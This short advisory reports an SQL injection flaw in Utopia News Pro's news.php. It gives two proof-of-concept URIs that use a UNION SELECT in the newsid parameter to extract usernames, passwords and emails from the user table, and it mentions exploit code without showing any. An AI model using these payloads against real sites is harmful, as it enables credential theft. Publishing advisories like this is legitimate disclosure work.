|
Utopia News Pro SQL Injection Vulnerability
No exploit is required. The following proof of concept URI is available: http://www.example.com/[path]/news.php?action=printable&newsid=%27%20UNION%20SELECT%20null,'20051007',username,password,null,email,null%20FROM%20unp_user%20WHERE%20userid=1/* The following proof of concept URI for versions prior to version 1.1.3 is available: http://www.example.com/[path]/news.php?action=printable&newsid=%27%20UNION%20SELECT%20null,'20051007',username,password,null,email%20FROM%20unp_user%20WHERE%20u serid=1/* The following exploit code is also available: |
|
|
Privacy Statement |
